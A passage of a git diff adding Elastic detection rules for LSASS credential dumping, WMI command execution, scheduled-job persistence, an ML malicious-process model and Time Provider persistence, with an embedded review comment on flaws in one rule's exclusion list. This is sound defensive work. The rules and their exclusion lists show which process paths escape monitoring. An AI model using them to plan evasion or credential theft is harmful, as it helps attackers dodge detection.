@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access attempts to LSASS handle, this may indicate an attempt to dump credentials from Lsass memory.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Lsass Process Access", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n not winlog.event_data.GrantedAccess :\n (\"0x1000\", \"0x1400\", \"0x101400\", \"0x101000\", \"0x101001\", \"0x100000\", \"0x100040\", \"0x3200\", \"0x40\", \"0x3200\") and\n not process.name : (\"procexp64.exe\", \"procmon.exe\", \"procexp.exe\", \"Microsoft.Identity.AadConnect.Health.AadSync.Host.ex\") and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\*\",\n \"?:\\\\ProgramData\\\\WebEx\\\\webex\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Windows\\\\CCM\\\\CcmExec.exe\",\n \"?:\\\\Windows\\\\LTSvc\\\\LTSVC.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\system32\\\\csrss.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsm.exe\",\n \"?:\\\\Windows\\\\system32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\n \"?:\\\\Windows\\\\system32\\\\wininit.exe\",\n \"?:\\\\Windows\\\\SystemTemp\\\\GUM*.tmp\\\\GoogleUpdate.exe\",\n \"?:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe\"\n ) and\n not winlog.event_data.CallTrace : (\"*mpengine.dll*\", \"*appresolver.dll*\", \"*sysmain.dll*\")\n", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": 
[ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.GrantedAccess", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "128468bf-cab1-4637-99ea-fdf3780a4609_107", + "type": "security-rule" +} \ No newline at end of file 
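Review bot: The `GrantedAccess` exclusion list in the `query` of this new rule file lists `"0x3200"` twice, so one entry is redundant and reads like a copy-paste slip; the list should be `("0x1000", "0x1400", "0x101400", "0x101000", "0x101001", "0x100000", "0x100040", "0x3200", "0x40")`. The `process.executable` exclusions for `?:\\Program Files\\*` and `?:\\Program Files (x86)\\*` are not paired with a code-signature condition, unlike the Veeam exclusion in the sibling rule 11ea6bec in this same diff, so every process launched from those directories is exempt regardless of signer; adding `process.code_signature.trusted == true` to that branch would keep the intent while narrowing the gap. The `process.name` entry `Microsoft.Identity.AadConnect.Health.AadSync.Host.ex` looks truncated; if the trailing `.ex` is deliberate because of how the source field is populated, a `/* … */` comment in the query (as the other EQL rules here use) should say so, otherwise it should end in `.exe`. If these rule JSON files are exported from an upstream rules repository rather than edited here, the fix belongs there.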
diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_110.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_110.json new file mode 100644 index 00000000000..101e6551039 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_110.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Cmd Execution via WMI", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + }, + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "12f07955-1674-44f7-86b5-c35da0a6f41a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_111.json b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_111.json new file mode 100644 index 00000000000..1af3f353b3a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/12f07955-1674-44f7-86b5-c35da0a6f41a_111.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Cmd Execution via WMI", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"WmiPrvSE.exe\" and process.name : \"cmd.exe\" and\n process.args : \"\\\\\\\\127.0.0.1\\\\*\" and process.args : (\"2>&1\", \"1>\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "12f07955-1674-44f7-86b5-c35da0a6f41a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use 
Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + }, + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "12f07955-1674-44f7-86b5-c35da0a6f41a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_107.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_107.json new file mode 100644 index 00000000000..ed866ad186e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_107.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A job can be used to schedule programs or scripts to be executed at a specified date and time. Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.", + "false_positives": [ + "Legitimate scheduled jobs may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Scheduled Job Creation", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\*\" and file.extension : \"job\" and\n not (\n (\n process.executable : \"?:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\CCleanerCrashReporting.job\"\n ) or\n (\n process.executable : (\n \"?:\\\\Program Files (x86)\\\\ManageEngine\\\\UEMS_Agent\\\\bin\\\\dcagentregister.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcagentregister.exe\"\n ) and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\DCAgentUpdater.job\"\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents 
will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "1327384f-00f3-44d5-9a8c-2373ba071e92_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_108.json b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_108.json new file mode 100644 index 00000000000..3bfe7dfb33a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1327384f-00f3-44d5-9a8c-2373ba071e92_108.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A job can be used to schedule programs or scripts to be executed at a specified date and time. Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.", + "false_positives": [ + "Legitimate scheduled jobs may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Scheduled Job Creation", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\*\" and file.extension : \"job\" and\n not (\n (\n process.executable : \"?:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\CCleanerCrashReporting.job\"\n ) or\n (\n process.executable : (\n \"?:\\\\Program Files (x86)\\\\ManageEngine\\\\UEMS_Agent\\\\bin\\\\dcagentregister.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcagentregister.exe\"\n ) and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\DCAgentUpdater.job\"\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions 
<8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "1327384f-00f3-44d5-9a8c-2373ba071e92_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_3.json b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_3.json new file mode 100644 index 00000000000..bea7e177518 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_3.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious.", + "from": "now-10m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity", + "query": "process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "blocklist_label", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "13e908b9-7bf0-4235-abc9-b5deb500d0ad", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + 
"type": "eql", + "version": 3 + }, + "id": "13e908b9-7bf0-4235-abc9-b5deb500d0ad_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_4.json b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_4.json new file mode 100644 index 00000000000..60370c3e32d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/13e908b9-7bf0-4235-abc9-b5deb500d0ad_4.json 
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious.", + "from": "now-10m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity", + "query": "process where (problemchild.prediction == 1 or blocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "blocklist_label", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "13e908b9-7bf0-4235-abc9-b5deb500d0ad", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. 
Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "13e908b9-7bf0-4235-abc9-b5deb500d0ad_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_108.json b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_108.json new file mode 100644 index 00000000000..904c0d233e2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/14ed1aa9-ebfd-4cf9-a463-0ac59ec55204_108.json 
@@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of the Time Provider. Adversaries may establish persistence by registering and enabling a malicious DLL as a time provider. Windows uses the time provider architecture to obtain accurate time stamps from other network devices or clients in the network. Time providers are implemented in the form of a DLL file which resides in the System32 folder. The service W32Time initiates during the startup of Windows and loads w32time.dll.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Persistence via Time Provider Modification", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence via Time Provider Modification\n\nThe Time Provider architecture in Windows is responsible for obtaining accurate timestamps from network devices or clients. It is implemented as a DLL file in the System32 folder and is initiated by the W32Time service during Windows startup. Adversaries may exploit this by registering and enabling a malicious DLL as a time provider to establish persistence. \n\nThis rule identifies changes in the registry paths associated with Time Providers, specifically targeting the addition of new DLL files.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
